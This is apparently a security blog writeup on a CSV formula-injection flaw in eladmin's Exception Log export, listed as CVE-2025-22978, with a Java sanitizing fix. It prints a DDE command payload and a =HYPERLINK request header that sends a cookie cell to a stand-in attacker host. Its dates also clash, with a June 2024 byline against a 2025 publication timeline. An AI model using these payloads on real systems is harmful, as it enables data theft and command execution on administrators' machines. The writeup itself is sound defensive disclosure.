Date: June 2024
Author: SecureTech Writeups
Are you running eladmin, the popular open-source admin system? If so, you should know about a dangerous vulnerability tracked as CVE-2025-22978. This security issue allows attackers to inject malicious formulas into the CSV files downloaded from the Exception Log module, an attack class known as "CSV Injection." In this detailed post, we break it down for you: simple, clear, with real-world code snippets, how the exploit works, and tips to keep your system safe.
🚨 What is CSV Injection?
CSV Injection (or Formula Injection) happens when user-controlled input is included in a CSV file without checks. If this data starts with a formula character like =, +, @, or - and someone opens the CSV in a spreadsheet like Microsoft Excel or LibreOffice, the formula can run automatically. This can leak data, steal credentials, or even run remote commands, depending on the formula.
📝 Where’s the Vulnerability in eladmin?
eladmin (<=2.7) has a management feature where you can download the Exception Log as a CSV file. The log entries can sometimes include user or attacker-supplied fields — like requestIp or description. These logs do not sanitize input for dangerous formula characters.
That means, if an attacker crafts a malicious exception (for example, by triggering an error using a crafted User-Agent header), the log could look like this:
| createTime          | requestIp          | description              |
|---------------------|--------------------|--------------------------|
| 2024-06-20 10:14:37 | =cmd\|' /C calc'!A | NullPointerException ... |
And when you, the admin, download the log and open it in Excel... BAM! The payload runs.
1. Attacker crafts input
Suppose a bad user sends a request to your system, setting User-Agent (or another loggable field) as:
```text
=cmd|'/C calc'!A
```
2. The log is generated
eladmin logs the exception, with requestIp or description field containing the attack string.
3. Admin downloads exception logs as CSV
The download feature does not sanitize or encode fields.
4. Opening CSV launches payload
When the file is opened in Excel, Excel will run the formula, potentially executing commands or making HTTP requests.
Example Entry in Exception Log
```csv
createTime,requestIp,description
2024-06-20 10:14:37,=cmd|' /C calc'!A,Exception stacktrace...
```
Minimal Exploit HTTP Example
```http
GET /some/url HTTP/1.1
Host: eladmin.example.com
User-Agent: =HYPERLINK("http://evil.example.com/?cookie="&B2)
```
🛡️ How to Fix (Mitigation)
The main fix is to sanitize all user-controlled fields before writing them to CSV.
Preferably, prefix dangerous values with a single quote ', which turns them into plain text in Excel.
Secure Output Function Example (Java)
```java
public static String sanitizeForCSV(String value) {
    // Values starting with a formula trigger are prefixed with a single quote,
    // which makes Excel and LibreOffice render the cell as plain text.
    // (OWASP's CSV Injection guidance also lists tab and carriage return as triggers.)
    if (value != null && (
            value.startsWith("=") ||
            value.startsWith("+") ||
            value.startsWith("-") ||
            value.startsWith("@"))) {
        return "'" + value;
    }
    return value;
}
```
Apply this to every field originating from user input or logs before writing to CSVs.
🕵️ Exploit Details
- Affected Software: eladmin <= v2.7 (GitHub Repository)
- Vulnerability: CSV Injection/Formula Injection in Exception Log Download
- Attack Vector: Remote attacker injects malicious formulas via exception-loggable input
- Impact: Remote code execution on admin's workstation (via Excel), data exfiltration, credential leaks
🧐 References & Links
- CVE-2025-22978 (Official MITRE Entry) *(Pending update)*
- eladmin GitHub Issue / Patch PR *(If/when available)*
- OWASP: CSV Injection
- Cheat Sheet: CSV Injection Prevention
🏁 Conclusion
If your organization uses eladmin, patch this now or implement the sanitization fix ASAP. Encourage your team never to open downloaded logs directly in Excel unless you're sure they’re clean. These formula-based attacks are sneaky and can lead to a much bigger breach than you imagine.
Stay safe, inspect your logs, secure your downloads!
*Like this post? Share with your IT colleagues. Got questions or want to report another vulnerability? Comment below or [reach out to us](mailto:security@securetech.example.com).*
Timeline
Published on: 02/03/2025 20:15:36 UTC
Last modified on: 03/13/2025 15:15:52 UTC